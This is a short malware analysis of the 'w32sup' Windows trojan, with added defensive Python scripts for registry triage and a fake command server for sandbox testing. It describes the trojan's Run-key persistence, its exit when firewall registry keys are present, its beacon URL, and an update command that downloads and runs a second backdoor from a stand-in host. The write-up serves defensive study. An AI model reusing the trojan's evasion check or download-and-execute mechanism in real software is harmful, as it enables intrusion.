This document is an initial, brief analysis of the "w32sup" trojan for Microsoft Windows, performed by Fortego Security in February 2004.
The antivirus software in use at the infected client (from a major, well-known vendor) did not detect this program, and neither did any of the spyware-detection tools we use. An internet search suggested that it might be "just" an adult-site dialer trojan.
The program was not really "encrypted" but packed with the UPX executable compressor. Neither the packed nor the unpacked executable was detected by the antivirus or antispyware products.
When w32sup.exe is run, it copies itself to C:\winnt\system32\ and adds an entry for itself under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ so that it is started automatically.
The program then checks the registry for keys belonging to personal firewall products: Tiny Personal Firewall, Sygate, DeerField, McAfee, Conseal, Signal 9, BlackICE and Zone Labs. If any of these keys is found the program exits. The check is on the registry keys only, so the presence of such keys is enough to make it exit even when no firewall is actually installed.
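As an added example (not part of Fortego's analysis), the following Python script triages a regedit export for the two host-side indicators just described: a Run entry pointing at w32sup.exe, and registry keys naming one of the firewall vendors whose presence makes the trojan exit. The sample export embedded in it is constructed for the example; the exact firewall key names are not given above, so the script matches vendor names as substrings of key paths, which is an assumption and only a heuristic.

```python
"""Triage a Windows registry export (.reg text) for w32sup indicators.

Added example, not Fortego's tooling.  Looks for (1) an HKLM Run value whose
data names w32sup.exe and (2) keys naming one of the personal-firewall vendors
the trojan checks for.  ASSUMPTION: the trojan's real firewall key names are
not documented, so vendor names are matched as substrings of key paths.
"""

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Vendors named in the analysis; substring matching on the key path is a
# heuristic, not the trojan's actual key list.
FIREWALL_VENDORS = ["tiny", "sygate", "deerfield", "mcafee", "conseal",
                    "signal 9", "blackice", "black ice", "zone labs", "zonelabs"]


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} from a regedit-style text dump.

    Only single-line values are handled; hex values continued over several
    lines contain no '=' and are skipped.  regedit writes UTF-16 files, so
    decode with encoding="utf-16" before calling this.
    """
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            # .reg files double backslashes inside REG_SZ data
            data = data.strip().strip('"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def find_w32sup_run_entries(keys):
    """Run-key values whose data references w32sup.exe (case-insensitive)."""
    hits = []
    for key, values in keys.items():
        if key.lower() == RUN_KEY.lower():
            for name, data in values.items():
                if "w32sup.exe" in data.lower():
                    hits.append((name, data))
    return hits


def firewall_markers(keys):
    """Map vendor -> key paths containing that vendor's name."""
    found = {}
    for key in keys:
        low = key.lower()
        for vendor in FIREWALL_VENDORS:
            if vendor in low:
                found.setdefault(vendor, []).append(key)
    return found


# Constructed sample export: one infected Run entry plus a Zone Labs key.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"w32sup"="C:\\winnt\\system32\\w32sup.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\ZoneAlarm]
"InstallDir"="C:\\Program Files\\Zone Labs\\ZoneAlarm"
"""

if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_EXPORT)
    print("w32sup Run entries:", find_w32sup_run_entries(parsed))
    print("firewall markers:  ", firewall_markers(parsed))
```

A hit from firewall_markers on a machine that has no firewall installed is worth noting during triage: it explains why the trojan may have exited silently there instead of beaconing, and why a sandbox used for dynamic analysis must be free of such keys.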
The program then listens on a local TCP port with a random port number (9149/tcp in one of our runs) and reports this port number to "Live-Vids" by requesting http://www.live-vids.com/r.php?id=9149. It then waits for a connection back from the server on that port. In the test environment we set up, we never received any connection on the stated port, from Live-Vids or anyone else.
If the trojan cannot reach Live-Vids for any reason (for example because the DNS lookup fails), it exits.
During the whole time we analyzed the w32sup trojan, the Live-Vids server only ever answered with a plain "200 OK". The program has another notable feature, however: the server can instead reply with a command of the form "update: 2.0 www.other-site.com/other-backdoor.exe". The w32sup trojan will then download the specified program from the internet and execute it on the infected system.
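To exercise the check-in and update path in a sandbox, here is a Python model of the exchange described above. It is an added example, not Fortego's tooling and not code from the trojan: parse_beacon extracts the advertised port from the /r.php?id=<port> request, parse_reply tells an update command apart from the plain OK reply, and FakeLiveVids is a stand-in server for a lab where www.live-vids.com resolves to the analyst's machine. The grammar "update: <version> <host/path>", the Host header check and the "OK" body text are this example's assumptions; the analysis only shows the one update line.

```python
"""Model of the w32sup check-in, for a lab network where www.live-vids.com
resolves to the analyst's machine.  Added example; not Fortego's tooling and
not code from the trojan.  Known from the analysis: the beacon URL
/r.php?id=<port> and a reply of either a plain 200 OK or an
'update: 2.0 www.other-site.com/other-backdoor.exe' command.
ASSUMPTIONS: the update line is parsed as 'update: <version> <host/path>';
the Host header check and the plain-text 'OK' body are this example's choice.
"""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

BEACON_HOST = "www.live-vids.com"
BEACON_PATH = "/r.php"
UPDATE_RE = re.compile(r"^update:\s*(\S+)\s+(\S+)\s*$")


def parse_beacon(request_line, host_header=None):
    """Return the listening port advertised in 'GET /r.php?id=N HTTP/1.x',
    or None if the request is not a w32sup beacon (wrong method, path,
    host or id).  host_header=None skips the Host check (HTTP/1.0 clients)."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return None
    if host_header is not None and host_header.lower() != BEACON_HOST:
        return None
    url = urlsplit(parts[1])
    if url.path != BEACON_PATH:
        return None
    ids = parse_qs(url.query).get("id")
    if not ids or not ids[0].isdigit():
        return None
    port = int(ids[0])
    return port if 0 < port < 65536 else None


def parse_reply(body):
    """Classify the server's reply body the way the trojan must:
    ('update', version, location) if an update command is present,
    otherwise ('ok',), meaning keep waiting for the connect-back."""
    for line in body.splitlines():
        m = UPDATE_RE.match(line.strip())
        if m:
            return ("update", m.group(1), m.group(2))
    return ("ok",)


class FakeLiveVids(BaseHTTPRequestHandler):
    """Stand-in for the Live-Vids server.  Leave update_command as None to
    reproduce the '200 OK' behaviour seen during the analysis; set it to an
    update line pointing at a harmless lab binary to drive the trojan into
    its download-and-execute path (e.g. with a breakpoint at 0x0040A429)."""
    update_command = None          # e.g. "update: 2.0 lab-host/harmless.exe"
    seen_beacons = []              # (client ip, advertised port) pairs

    def do_GET(self):
        port = parse_beacon("GET %s HTTP/1.1" % self.path,
                            self.headers.get("Host"))
        if port is None:
            self.send_error(404)
            return
        self.seen_beacons.append((self.client_address[0], port))
        body = ((self.update_command or "OK") + "\r\n").encode("ascii")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        print("[fake-c2] %s: %s" % (self.client_address[0], fmt % args))


if __name__ == "__main__":
    # Sandbox use: bind port 80 (needs privileges), then connect back to each
    # advertised port yourself to see what the trojan's listener accepts.
    HTTPServer(("0.0.0.0", 80), FakeLiveVids).serve_forever()
```

Because the trojan exits when it cannot reach Live-Vids, the fake server (or at least a DNS answer for www.live-vids.com) has to be in place before the sample is started, otherwise nothing beyond the registry changes will be observed.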
In our opinion this is quite devious and interesting, since the "real" intentions of the people behind this program are not revealed until the "real" backdoor is downloaded, after the update command has been sent. Until then it can always be argued that this is "only" another porn dialer.
For debugging purposes, a useful breakpoint can be set at 0x0040A429, the subroutine which decides whether to "update" or not.
The w32sup.exe sample can be downloaded here. The file is encrypted with GnuPG using the passphrase "foobar", to prevent it from being detected by antivirus software in the future and to prevent it from being downloaded and executed by mistake.